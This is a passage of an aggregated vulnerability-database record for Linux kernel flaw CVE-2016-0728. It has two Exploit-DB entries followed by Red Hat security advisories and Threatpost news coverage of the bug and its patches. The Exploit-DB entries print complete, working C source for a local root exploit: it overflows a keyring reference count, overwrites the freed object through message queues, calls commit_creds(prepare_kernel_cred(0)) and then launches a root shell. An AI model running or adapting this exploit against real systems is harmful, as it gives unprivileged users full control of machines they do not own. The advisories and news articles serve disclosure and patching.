<time.h>\r\n#include <unistd.h>\r\n\r\n#include <sys/ipc.h>\r\n#include <sys/msg.h>\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n\r\n#define STRUCT_LEN (0xb8 - 0x30)\r\n#define COMMIT_CREDS_ADDR (0xffffffff810bb050)\r\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)\r\n\r\n\r\n\r\nstruct key_type {\r\n char * name;\r\n size_t datalen;\r\n void * vet_description;\r\n void * preparse;\r\n void * free_preparse;\r\n void * instantiate;\r\n void * update;\r\n void * match_preparse;\r\n void * match_free;\r\n void * revoke;\r\n void * destroy;\r\n};\r\n\r\n/* thanks spender - Federico Bento */\r\nstatic unsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[256];\r\n int ret;\r\n\r\n f = fopen(\"/proc/kallsyms\", \"r\");\r\n if (f == NULL) {\r\n fprintf(stdout, \"Unable to obtain symbol listing!\\n\");\r\n exit(0);\r\n }\r\n\r\n ret = 0;\r\n while(ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fprintf(stdout, \"[+] Resolved %s to %p\\n\", name, (void *)addr);\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n\r\n fclose(f);\r\n return 0;\r\n}\r\n\r\nvoid userspace_revoke(void * key) {\r\n commit_creds(prepare_kernel_cred(0));\r\n}\r\n\r\nint main(int argc, const char *argv[]) {\r\n const char *keyring_name;\r\n size_t i = 0;\r\n unsigned long int l = 0x100000000/2;\r\n key_serial_t serial = -1;\r\n pid_t pid = -1;\r\n struct key_type * my_key_type = NULL;\r\n\r\n struct {\r\n long mtype;\r\n char mtext[STRUCT_LEN];\r\n } msg = {0x4141414141414141, {0}};\r\n int msqid;\r\n\r\n if (argc != 2) {\r\n puts(\"usage: ./keys <key_name>\");\r\n return 1;\r\n }\r\n\r\n printf(\"[+] uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n commit_creds = (_commit_creds)get_kernel_sym(\"commit_creds\");\r\n prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym(\"prepare_kernel_cred\");\r\n if(commit_creds == NULL || prepare_kernel_cred == NULL) {\r\n commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;\r\n prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;\r\n if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)\r\n puts(\"[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source\");\r\n }\r\n\r\n my_key_type = malloc(sizeof(*my_key_type));\r\n\r\n my_key_type->revoke = (void*)userspace_revoke;\r\n memset(msg.mtext, 'A', sizeof(msg.mtext));\r\n\r\n // key->uid\r\n *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\r\n //key->perm\r\n *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\r\n\r\n //key->type\r\n *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\r\n\r\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n perror(\"msgget\");\r\n exit(1);\r\n }\r\n\r\n keyring_name = argv[1];\r\n\r\n /* Set the new session keyring before we start */\r\n\r\n serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\r\n if (serial < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n\r\n if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n\r\n\r\n puts(\"[+] Increfing...\");\r\n for (i = 1; i < 0xfffffffd; i++) {\r\n if (i == (0xffffffff - l)) {\r\n l = l/2;\r\n sleep(5);\r\n }\r\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n perror(\"[-] keyctl\");\r\n return -1;\r\n }\r\n }\r\n sleep(5);\r\n /* here we are going to leak the last references to overflow */\r\n for (i=0; i<5; ++i) {\r\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n perror(\"[-] keyctl\");\r\n return -1;\r\n }\r\n }\r\n\r\n puts(\"[+] Finished increfing\");\r\n puts(\"[+] Forking...\");\r\n /* allocate msg struct in the kernel rewriting the freed keyring object */\r\n for (i=0; i<64; i++) {\r\n pid = fork();\r\n if (pid == -1) {\r\n perror(\"[-] fork\");\r\n return -1;\r\n }\r\n\r\n if (pid == 0) {\r\n sleep(2);\r\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n perror(\"[-] msgget\");\r\n exit(1);\r\n }\r\n for (i = 0; i < 64; i++) {\r\n if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {\r\n perror(\"[-] msgsnd\");\r\n exit(1);\r\n }\r\n }\r\n sleep(-1);\r\n exit(1);\r\n }\r\n }\r\n\r\n puts(\"[+] Finished forking\");\r\n sleep(5);\r\n\r\n /* call userspace_revoke from kernel */\r\n puts(\"[+] Caling revoke...\");\r\n if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\r\n perror(\"[+] keyctl_revoke\");\r\n }\r\n\r\n printf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\r\n\r\n return 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40003/"}, {"lastseen": "2016-02-04T09:49:49", "description": "Linux Kernel REFCOUNT Overflow/Use-After-Free in Keyrings. CVE-2016-0728. Local exploit for linux platform", "published": "2016-01-19T00:00:00", "type": "exploitdb", "title": "Linux Kernel REFCOUNT Overflow/Use-After-Free in Keyrings", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "EDB-ID:39277", "href": "https://www.exploit-db.com/exploits/39277/", "sourceData": "# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\r\n# Date: 19/1/2016\r\n# Exploit Author: Perception Point Team\r\n# CVE : CVE-2016-0728\r\n\r\n/* CVE-2016-0728 local root exploit\r\n modified by Federico Bento to read kernel symbols from /proc/kallsyms\r\n props to grsecurity/PaX for preventing this in so many ways\r\n\r\n $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall\r\n $ ./cve_2016_072 PP_KEY */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <keyutils.h>\r\n#include <unistd.h>\r\n#include <time.h>\r\n#include <unistd.h>\r\n\r\n#include <sys/ipc.h>\r\n#include <sys/msg.h>\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* \r\n_prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n\r\n#define STRUCT_LEN (0xb8 - 0x30)\r\n#define COMMIT_CREDS_ADDR (0xffffffff810bb050)\r\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)\r\n\r\n\r\n\r\nstruct key_type {\r\n\tchar * name;\r\n \tsize_t datalen;\r\n \tvoid * vet_description;\r\n \tvoid * preparse;\r\n \tvoid * free_preparse;\r\n \tvoid * instantiate;\r\n \tvoid * update;\r\n \tvoid * match_preparse;\r\n \tvoid * match_free;\r\n \tvoid * revoke;\r\n \tvoid * destroy;\r\n};\r\n\r\n/* thanks spender - Federico Bento */\r\nstatic unsigned long get_kernel_sym(char *name)\r\n{\r\n\tFILE *f;\r\n\tunsigned long addr;\r\n\tchar dummy;\r\n\tchar sname[256];\r\n\tint ret;\r\n\r\n\tf = fopen(\"/proc/kallsyms\", \"r\");\r\n\tif (f == NULL) {\r\n\t\tfprintf(stdout, \"Unable to obtain symbol listing!\\n\");\r\n\t\texit(0);\r\n\t}\r\n\r\n\tret = 0;\r\n\twhile(ret != EOF) {\r\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n\t\tif (ret == 0) {\r\n\t\t\tfscanf(f, \"%s\\n\", sname);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sname)) {\r\n\t\t\tfprintf(stdout, \"[+] Resolved %s to %p\\n\", name, (void *)addr);\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n\r\n\tfclose(f);\r\n\treturn 0;\r\n}\r\n\r\nvoid userspace_revoke(void * key) {\r\n \tcommit_creds(prepare_kernel_cred(0));\r\n}\r\n\r\nint main(int argc, const char *argv[]) {\r\n\tconst char *keyring_name;\r\n\tsize_t i = 0;\r\n unsigned long int l = 0x100000000/2;\r\n\tkey_serial_t serial = -1;\r\n\tpid_t pid = -1;\r\n struct key_type * my_key_type = NULL;\r\n\r\n struct {\r\n\t\tlong mtype;\r\n\t\tchar mtext[STRUCT_LEN];\r\n\t} msg = {0x4141414141414141, {0}};\r\n\tint msqid;\r\n\r\n\tif (argc != 2) {\r\n\t\tputs(\"usage: ./keys <key_name>\");\r\n\t\treturn 1;\r\n\t}\r\n\r\n \tprintf(\"[+] uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n\tcommit_creds = (_commit_creds)get_kernel_sym(\"commit_creds\");\r\n \tprepare_kernel_cred = \r\n(_prepare_kernel_cred)get_kernel_sym(\"prepare_kernel_cred\");\r\n\tif(commit_creds == NULL || prepare_kernel_cred == NULL) {\r\n\t\tcommit_creds = (_commit_creds)COMMIT_CREDS_ADDR;\r\n prepare_kernel_cred = \r\n(_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;\r\n if(commit_creds == (_commit_creds)0xffffffff810bb050 \r\n|| prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)\r\n \tputs(\"[-] You probably need to change the address of \r\ncommit_creds and prepare_kernel_cred in source\");\r\n\t}\r\n\r\n \tmy_key_type = malloc(sizeof(*my_key_type));\r\n\r\n \tmy_key_type->revoke = (void*)userspace_revoke;\r\n \tmemset(msg.mtext, 'A', sizeof(msg.mtext));\r\n\r\n \t// key->uid\r\n \t*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\r\n \t//key->perm\r\n \t*(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\r\n\r\n \t//key->type\r\n \t*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\r\n\r\n \tif ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n \t\tperror(\"msgget\");\r\n \texit(1);\r\n \t}\r\n\r\n \tkeyring_name = argv[1];\r\n\r\n\t/* Set the new session keyring before we start */\r\n\r\n\tserial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\r\n\tif (serial < 0) {\r\n\t\tperror(\"keyctl\");\r\n\t\treturn -1;\r\n \t}\r\n\r\n\tif (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | \r\nKEY_GRP_ALL | KEY_OTH_ALL) < 0) {\r\n\t\tperror(\"keyctl\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\r\n\tputs(\"[+] Increfing...\");\r\n \tfor (i = 1; i < 0xfffffffd; i++) {\r\n \tif (i == (0xffffffff - l)) {\r\n \t\tl = l/2;\r\n \t\tsleep(5);\r\n \t}\r\n \tif (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n \t\tperror(\"[-] keyctl\");\r\n \t\treturn -1;\r\n \t}\r\n \t}\r\n \tsleep(5);\r\n \t/* here we are going to leak the last references to overflow */\r\n \tfor (i=0; i<5; ++i) {\r\n \tif (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n \t\tperror(\"[-] keyctl\");\r\n \t\treturn -1;\r\n \t}\r\n \t}\r\n\r\n \tputs(\"[+] Finished increfing\");\r\n \tputs(\"[+] Forking...\");\r\n \t/* allocate msg struct in the kernel rewriting the freed keyring \r\nobject */\r\n \tfor (i=0; i<64; i++) {\r\n \tpid = fork();\r\n \tif (pid == -1) {\r\n \t\tperror(\"[-] fork\");\r\n \t\treturn -1;\r\n \t}\r\n\r\n \tif (pid == 0) {\r\n \t\tsleep(2);\r\n \t\tif ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n \t\tperror(\"[-] msgget\");\r\n \t\texit(1);\r\n \t\t}\r\n \t\tfor (i = 0; i < 64; i++) {\r\n \t\tif (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {\r\n \t\t\tperror(\"[-] msgsnd\");\r\n \t\t\texit(1);\r\n \t\t}\r\n \t\t}\r\n \t\tsleep(-1);\r\n \t\texit(1);\r\n \t}\r\n \t}\r\n\r\n \tputs(\"[+] Finished forking\");\r\n \tsleep(5);\r\n\r\n \t/* call userspace_revoke from kernel */\r\n \tputs(\"[+] Caling revoke...\");\r\n \tif (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\r\n \tperror(\"[+] keyctl_revoke\");\r\n \t}\r\n\r\n \tprintf(\"uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n \texecl(\"/bin/sh\", \"/bin/sh\", NULL);\r\n\r\n \treturn 0;\r\n}\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39277/"}], "redhat": [{"lastseen": "2019-08-13T18:46:01", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in certain\nerror path of the join_session_keyring() function. A local, unprivileged\nuser could use this flaw to escalate their privileges on the system.\n(CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel-rt users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. The system must be\nrebooted for this update to take effect.", "modified": "2018-03-19T16:29:53", "published": "2016-01-25T23:47:39", "id": "RHSA-2016:0065", "href": "https://access.redhat.com/errata/RHSA-2016:0065", "type": "redhat", "title": "(RHSA-2016:0065) Important: kernel-rt security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:31", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in certain\nerror path of the join_session_keyring() function. A local, unprivileged\nuser could use this flaw to escalate their privileges on the system.\n(CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. The system must be\nrebooted for this update to take effect.", "modified": "2018-04-12T03:32:56", "published": "2016-01-25T23:47:36", "id": "RHSA-2016:0064", "href": "https://access.redhat.com/errata/RHSA-2016:0064", "type": "redhat", "title": "(RHSA-2016:0064) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:03", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1805", "CVE-2015-8104", "CVE-2016-0728", "CVE-2016-0774"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the x86 ISA (Instruction Set Architecture) is prone to\na denial of service attack inside a virtualized environment in the form of\nan infinite loop in the microcode due to the way (sequential) delivering of\nbenign exceptions such as #DB (debug exception) is handled. A privileged\nuser inside a guest could use this flaw to create denial of service\nconditions on the host kernel. (CVE-2015-8104, Important)\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in certain\nerror path of the join_session_keyring() function. A local, unprivileged\nuser could use this flaw to escalate their privileges on the system.\n(CVE-2016-0728, Important)\n\n* It was found that the fix for CVE-2015-1805 incorrectly kept buffer\noffset and buffer length in sync on a failed atomic read, potentially\nresulting in a pipe buffer state corruption. A local, unprivileged user\ncould use this flaw to crash the system or leak kernel memory to user\nspace. (CVE-2016-0774, Moderate)\n\nRed Hat would like to thank the Perception Point research team for\nreporting the CVE-2016-0728 issue. The security impact of the CVE-2016-0774\nissue was discovered by Red Hat.\n\nBug fixes:\n\n* NMI watchdog of guests using legacy LVT0-based NMI delivery did not work\nwith APICv. Now, NMI works with LVT0 regardless of APICv. (BZ#1244726)\n\n* Parallel file-extending direct I/O writes could previously race to update\nthe size of the file. If they executed out-of-order, the file size could\nmove backwards and push a previously completed write beyond the end of the\nfile, causing it to be lost. (BZ#1258942)\n\n* The GHES NMI handler had a global spin lock that significantly increased\nthe latency of each perf sample collection. This update simplifies locking\ninside the handler. (BZ#1280200)\n\n* Sometimes, iptables rules are updated along with ip rules, and routes are\nreloaded. Previously, skb->sk was mistakenly attached to some IPv6\nforwarding traffic packets, which could cause kernel panic. Now, such\npackets are checked and not processed. (BZ#1281700)\n\n* The NUMA node was not reported for PCI adapters, which affected every\nPOWER system deployed with Red Hat Enterprise Linux 7 and caused\nsignificant decrease in the system performance. (BZ#1283525)\n\n* Processing packets with a lot of different IPv6 source addresses caused\nthe kernel to return warnings concerning soft-lockups due to high lock\ncontention and latency increase. (BZ#1285369)\n\n* Running edge triggered interrupts with an ack notifier when\nsimultaneously reconfiguring the Intel I/O IOAPIC did not work correctly,\nso EOI in the interrupt did not cause a VM to exit if APICv was enabled.\nConsequently, the VM sometimes became unresponsive. (BZ#1287001)\n\n* Block device readahead was artificially limited, so the read performance\nwas poor, especially on RAID devices. Now, per-device readahead limits are\nused for each device, which has improved read performance. (BZ#1287548)\n\n* Identical expectations could not be tracked simultaneously even if they\nresided in different connection tracking zones. Now, an expectation insert\nattempt is rejected only if the zone is also identical. (BZ#1290093)\n\n* The storvsc kernel driver for Microsoft Hyper-V storage was setting\nincorrect SRB flags, and Red Hat Enterprise Linux 7 guests running on\nMicrosoft Hyper-V were experiencing slow I/O as well as I/O failures when\nthey were connected to a virtual SAN. Now, SRB flags are set correctly.\n(BZ#1290095)\n\n* When a NUMA system with no memory in node 0 was used, the system\nterminated unexpectedly during boot or when using OpenVSwitch. Now, the\nkernel tries to allocate memory from other nodes when node 0 is not\npresent. (BZ#1300950)\n\nEnhancement:\n\n* IPsec has been updated to provide many fixes and some enhancements.\nOf particular note is the ability to match on outgoing interfaces.\n(BZ#1287407)", "modified": "2016-04-04T19:57:06", "published": "2016-02-02T21:05:39", "id": "RHSA-2016:0103", "href": "https://access.redhat.com/errata/RHSA-2016:0103", "type": "redhat", "title": "(RHSA-2016:0103) Important: kernel security, bug fix, and enhancement update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:32:42", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7421", "CVE-2014-8171", "CVE-2014-9644", "CVE-2015-2925", "CVE-2016-0728"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in certain\nerror path of the join_session_keyring() function. A local, unprivileged\nuser could use this flaw to escalate their privileges on the system.\n(CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel-rt users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. The system must be\nrebooted for this update to take effect.\n", "modified": "2018-06-07T08:58:29", "published": "2016-01-26T05:00:00", "id": "RHSA-2016:0068", "href": "https://access.redhat.com/errata/RHSA-2016:0068", "type": "redhat", "title": "(RHSA-2016:0068) Important: kernel-rt security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:55:52", "bulletinFamily": "info", "cvelist": ["CVE-2016-0728"], "description": "A patch for a critical Linux kernel flaw, present in the code since 2012, is expected to be pushed out today.\n\nThe vulnerability affects versions 3.8 and higher, said researchers at startup Perception Point who discovered the vulnerability. The flaw also extends to two-thirds of Android devices, the company added.\n\n\u201cIt\u2019s pretty bad because a user with legitimate or lower privileges can gain root access and compromise the whole machine,\u201d Yevgeny Pats, cofounder and CEO of Perception Point. \u201cWith no auto update for the kernel, these versions could be vulnerable for a long time. Every Linux server needs to be patched as soon the patch is out.\u201d\n\nPats said an attacker would require local access to exploit the vulnerability on a Linux server. A malicious mobile app would get the job done on an Android device (Kit-Kat and higher), he said. Pats added that exploitation of the flaw is fairly straightforward, but it\u2019s unknown whether it\u2019s been attacked to date.\n\n\u201cThe fix was simple,\u201d Pats said. \u201cThe problem is not all devices Linux get patched automatically.\u201d\n\nThe vulnerability, CVE-2016-0728, lives in the keyring facility built into the various flavors of Linux. The keyring encrypts and stores login information, encryption keys and certificates, and makes them available to applications. In a report published by Perception Point, researchers said the vulnerability is a [reference leak](<http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/>) that can be abused to ultimately execute code in the Linux kernel.\n\n\u201cUser space applications give [keyring] the option to manage the crypto keys,\u201d Pats said. \u201cThe user doesn\u2019t have to manage keys; the OS does it for the application. Apps use it for security reasons. When they want to apps to work with crypto, they use this feature. The feature has kernel access; the OS gives the userland app the ability to use this feature. The problem is that the code runs in the kernel.\u201d\n\nPats said that SMEP (Supervisor Mode Execution Protection) and SMAP (Supervicor Mode Access Protection) make exploitation difficult on Linux servers, while SELinux does the same for Android devices. SMEP and SMAP are relatively new features that prevent the kernel from accessing and executing code from userland.\n\nThe flaw may linger a little longer on Android devices, since most updates are not pushed automatically by carriers and manufacturers. Android is built upon the Linux kernel, but customized without many of the libraries that accompany standard Linux builds.\n\nPerception Point published a technical analysis of the vulnerability and how to exploit it, including [proof-of-concept code](<https://gist.github.com/PerceptionPointTeam/18b1e86d1c0f8531ff8f>) published to its Github page.\n", "modified": "2016-01-20T20:41:01", "published": "2016-01-19T07:47:18", "id": "THREATPOST:C5F01C375D7DB776A2A5902570B2E5FD", "href": "https://threatpost.com/serious-linux-kernel-vulnerability-patched/115923/", "type": "threatpost", "title": "Linux Kernel Privilege Escalation Flaw Patched", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:53", "bulletinFamily": "info", "cvelist": ["CVE-2016-0728"], "description": "Google is downplaying the scope of the [critical Linux vulnerability](<https://threatpost.com/serious-linux-kernel-vulnerability-patched/115923/>) patched this week, suggesting that the number of affected Android devices has been exaggerated.\n\nThe Android OS is built upon the Linux kernel, but minus many of the libraries that are included in standard Linux builds. Initially, startup Perception Point said that upwards of two-thirds of Android devices would be affected by the vulnerability. The flaw, introduced into the Linux source code in 2012, could be abused by a local attacker to elevate privileges on a Linux server or Android phone via a malicious mobile application.\n\nOn its end, [Google has patched the flaw](<https://plus.google.com/+AdrianLudwig/posts/KxHcLPgSPoY>) in the Android code and on Wednesday released the fix to open source and its partners. Google\u2019s Adrian Ludwig, lead engineer for Android security, said the patch would be required on all devices with a patch level of March 1, 2016 or greater.\n\nLudwig, however, took issue with Perception Point\u2019s estimates that as many as 66 percent of devices were affected.\n\n\u201cWe believe that the number of Android devices affected is significantly smaller than initially reported,\u201d Ludwig said, adding that Perception Point did not privately disclose the vulnerability to Google or the Android security team as it did with the Linux security team.\n\nPerception Point cofounder and CEO Yevgeny Pats told Threatpost this week the vulnerability that it was unknown whether the flaw was under attack.\n\nLudwig, meanwhile, said that while vulnerability affects Linux versions 3.8 and higher, significantly fewer versions of Android are affected.\n\n\u201cWe believe that no Nexus devices are vulnerable to exploitation by third party applications. Further, devices with Android 5.0 and above are protected, as the Android SELinux policy prevents third party applications from reaching the affected code,\u201d Ludwig said. \u201cAlso, many devices running Android 4.4 and earlier do not contain the vulnerable code introduced in Linux kernel 3.8, as those newer kernel versions are not common on older Android devices.\u201d\n\nPerception Point provided Threatpost with a statement this morning:\n\n> \u201cAs stated, the bug affects android versions with KitKat and higher and it doesn\u2019t matter if the device has SELinux enabled or not. SELinux only affects the exploitation potential and as stated in the [blog](<http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/>) our research team is working on an exploitation for Android devices with SELinux enabled. The results of that will be published in the next blogpost. Nexus with the newest version comes with the keyring feature compiled in. So we are still standing behind the ~66% of all android devices are affected by the bug.\u201d\n\nAccording to the [Android developers dashboard](<http://developer.android.com/about/dashboards/index.html>), 33.3 percent of devices are on the most recent versions of Android (Lollipop 5.0 and 5.1, and Marshmallow 6.0), while 36.1 percent of devices are on Android 4.4 (KitKat) and 24.7 percent are running Jelly Bean (4.1, 4.2, 4.3). Duo Labs, meanwhile, published a report this week that said most [Android devices are woefully out of date](<https://duo.com/blog/duo-analytics-android-device-security-article>) and that fail basic security hygiene such as enabling a passcode. The report said that one in 20 Android devices are rooted (by comparison, Duo Labs said one in 250 iPhones are jailbroken), and that one in 10 devices don\u2019t have a pre-boot passcode device encryption enabled.\n\nThe vulnerability, CVE-2016-0728, lives in the keyring facility built into the various flavors of Linux. The keyring encrypts and stores login information, encryption keys and certificates, and makes them available to applications. In a report published by Perception Point, researchers said the vulnerability is a reference leak that can be abused to ultimately execute code in the Linux kernel.\n\n\u201cUser space applications give [keyring] the option to manage the crypto keys,\u201d Pats said. \u201cThe user doesn\u2019t have to manage keys; the OS does it for the application. Apps use it for security reasons. When they want to apps to work with crypto, they use this feature. The feature has kernel access; the OS gives the userland app the ability to use this feature. The problem is that the code runs in the kernel.\u201d\n", "modified": "2016-01-21T16:46:56", "published": "2016-01-21T11:45:56", "id": "THREATPOST:3457E4B368AF24E94CB5545AC02382A8", "href": "https://threatpost.com/google-challenges-number-of-android-devices-affected-by-linux-flaw-1/115966/", "type": "threatpost", "title": "Android Devices Linux Zero Day Kernel Vulnerability", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:42", "bulletinFamily": "info", "cvelist": ["CVE-2016-0728", "CVE-2016-0815", "CVE-2016-0816", "CVE-2016-0818", "CVE-2016-0819", "CVE-2016-0820", "CVE-2016-1621"], "description": "Google today patched two critical holes in its problematic Android Mediaserver component which would allow an attacker to use email, web browsing, and MMS processing of media files to remotely execute code. With this latest vulnerability, Google has patched its Mediaserver more than two dozen times since the [Stagefright vulnerability](<https://threatpost.com/android-stagefright-flaws-put-950-million-devices-at-risk/113960/>) was discovered in August.\n\nThe patch is part of Google\u2019s monthly over-the-air security update for Android Nexus devices. In total, Google identified 16 vulnerabilities as part of this month\u2019s [Android Nexus Security Bulletin](<https://source.android.com/security/bulletin/>), of which six were rated as critical, eight as high and two as moderate. Google said a Nexus patch would be available within the next 48 hours and available at the Android Open Source Project repository. It says wireless carriers and device makers were made aware of the upcoming security bulletin on Feb. 1.\n\nAccording to Google, the critical flaws could enable remote code execution on an affected device via email, web browsing, and MMS when processing media files. \u201cDuring media file and data processing of a specially crafted file, vulnerabilities in Mediaserver could allow an attacker to cause memory corruption and remote code execution as the Mediaserver process,\u201d wrote Google in its bulletin.\n\nAlong with the Mediaserver vulnerabilities (CVE-2016-0815 and CVE-2016-0816), Google identified a third Libvpx critical vulnerability (CVE-2016-1621) that\u2019s also susceptible to remote code execution.\n\n\u201cOn one hand, this type of functionality (Mediaserver) is known to have vulnerabilities. But knowing that, Google could do a much better job isolating this type of risky attack surface as well as making sure that the Mediaserver can be updated in an expedient manner,\u201d said Jon Oberheide, co-founder and CTO, Duo Security. \u201cWireless carriers are notoriously slow when it comes to these type of out-of-band patches,\u201d he said.\n\nGoogle said Nexus device owners need to update Nexus firmware Builds LMY49H and later, and Android Marshmallow. Alternatively, Android users can check the firmware version on their devices to see if the updates have been applied along with verifying the date the latest Android security patch was installed.\n\nAs part of Google\u2019s remediation efforts, it said the Android Security team is actively monitoring for abuse with Verify Apps and SafetyNet which both warn users of potentially harmful applications about to be installed. Google said it was unaware of any attempts to exploit the listed vulnerabilities.\n\nGoogle also said it was releasing patches critical privilege elevation vulnerability in the Android kernel. Vulnerabilities identified are a Conscrypt (CVE-2016-0818) and weaknesses found inside a Qualcomm performance component (CVE-2016-0819) and MediaTek\u2019s Wi-Fi driver (CVE-2016-0820) and in device\u2019s keyring component (CVE-2016-0728).\n", "modified": "2016-03-07T17:16:54", "published": "2016-03-07T14:00:02", "id": "THREATPOST:45807D1856E34DEFF51A771D0E730AA3", "href": "https://threatpost.com/google-fixes-critical-android-mediaserver-bugs-again/116614/", "type": "threatpost", "title": "Google Fixes Critical Mediaserver Bug, Again", "cvss": {"score": 10.0, "vector": 